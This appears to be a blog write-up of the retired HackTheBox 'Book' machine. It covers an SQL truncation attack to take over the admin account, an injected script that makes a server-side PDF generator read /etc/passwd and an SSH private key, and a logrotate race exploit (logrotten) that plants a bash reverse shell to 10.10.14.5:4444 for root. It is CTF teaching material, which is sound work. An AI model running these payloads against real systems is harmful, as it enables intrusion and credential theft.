Preamble
Back to the Writeup Hackthebox series, Hackthebox yesterday retired this Book, rated Medium. This article was made on March 24 but is only public now. Let’s find out how this song plays.
Get User
Scanning nmap and see that this server has a website at port 80. If you register, there is no problem, register by mail [email protected]
then this account already exists.
Remember the old postbook post then registered correctly according to the admin’s email, then login again will be admin
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | <span class="token request-line"><span class="token property">POST</span> /index.php HTTP/1.1</span> <span class="token header-name keyword">Host:</span> 10.10.10.176 <span class="token header-name keyword">User-Agent:</span> Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 <span class="token header-name keyword">Accept:</span> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 <span class="token header-name keyword">Accept-Language:</span> en-US,en;q=0.5 <span class="token header-name keyword">Accept-Encoding:</span> gzip, deflate <span class="token header-name keyword">Referer:</span> http://10.10.10.176/index.php <span class="token header-name keyword">Content-Type:</span> application/x-www-form-urlencoded <span class="token header-name keyword">Content-Length:</span> 59 <span class="token header-name keyword">Connection:</span> close <span class="token header-name keyword">Cookie:</span> PHPSESSID=ace5kg7uekbf6mo1bjjcb3iq6h <span class="token header-name keyword">Upgrade-Insecure-Requests:</span> 1 name=admin&email=admin%40book.htb 11& <a class="__cf_email__" href="/cdn-cgi/l/email-protection">[email protected]</a> |
Here is called SQL truncation attack. Truncate the SQL string to bypass check name.
Register an admin account then look around to see what the function is.
There is a Collection function, which helps to post books, and an admin has a function to view a Collection list.
And this is the content of Collections
Here, the website has a function that is to take the title and author to write to the PDF file with the server-side JS, through which you can use JS to write the local file into the PDF file so that it can be read
1 2 3 4 5 6 7 8 9 | <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> script</span> <span class="token punctuation">></span></span> <span class="token script"><span class="token language-javascript"> x <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">XMLHttpRequest</span> <span class="token punctuation">;</span> x <span class="token punctuation">.</span> <span class="token function-variable function">onload</span> <span class="token operator">=</span> <span class="token keyword">function</span> <span class="token punctuation">(</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> document <span class="token punctuation">.</span> <span class="token function">write</span> <span class="token punctuation">(</span> <span class="token keyword">this</span> <span class="token punctuation">.</span> responseText <span class="token punctuation">)</span> <span class="token punctuation">}</span> <span class="token punctuation">;</span> x <span class="token punctuation">.</span> <span class="token function">open</span> <span class="token punctuation">(</span> <span class="token string">"GET"</span> <span class="token punctuation">,</span> <span class="token string">"file:///etc/passwd"</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> x <span class="token punctuation">.</span> <span class="token function">send</span> <span class="token punctuation">(</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> </span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> script</span> <span class="token punctuation">></span></span> |
Fill in the title with the above payload and get the result
Read the file /etc/passwd
, we can read the key file rsa to be able to ssh to the server, there is a reader
user, can guess the key directory rsa is /home/reader/.ssh/id_rsa
Obtain the private key file, which can be used to ssh to the server
Since the PDF file does not display the full private key, here use the tool to convert pdf to text to get all the text from the pdf file https://github.com/pdfminer/pdfminer.six/
After obtaining the private key, we can ssh to the server
Get the User flag
Get Root
Run pspy64
to see the processes running on the server and see
Root is running logrotate
program to write to log, search on google to see if this program exploits, there is a program here https://github.com/whotwagner/logrotten
Compile gcc logrotten
program then push it up on the box, read the instructions on the github page then create a payload file saved to the payloadfile
1 2 | <a class="__cf_email__" href="/cdn-cgi/l/email-protection">[email protected]</a> :/tmp$ echo “bash -i >& /dev/tcp/10.10.14.5/4444 0>&1” > payloadfile |
Then run the program and write to the access.log
file found in the user’s backups
folder
1 2 3 4 5 6 7 8 9 10 11 12 | <a class="__cf_email__" href="/cdn-cgi/l/email-protection">[email protected]</a> :/tmp$ ./logrotten -p ./payloadfile ~/backups/access.log -d logfile: /home/reader/backups/access.log logpath: /home/reader/backups logpath2: /home/reader/backups2 targetpath: /etc/bash_completion.d/access.log targetdir: /etc/bash_completion.d p: access.log Waiting for rotating /home/reader/backups/access.log... Renamed /home/reader/backups with /home/reader/backups2 and created symlink to /etc/bash_completion.d Waiting 1 seconds before writing payload... Done! |
Open 1 more terminal to write to the access.log file
1 2 | <a class="__cf_email__" href="/cdn-cgi/l/email-protection">[email protected]</a> :~$ echo '1' > backups/access.log |
This time we only have 5s to read the flag, then the connection is closed, at the port 4444 listener, after rooting and then read the flag immediately: v
Conclusion
A post that has quite a bit of technique in it, hopefully everyone can learn something from it. Happy hacking!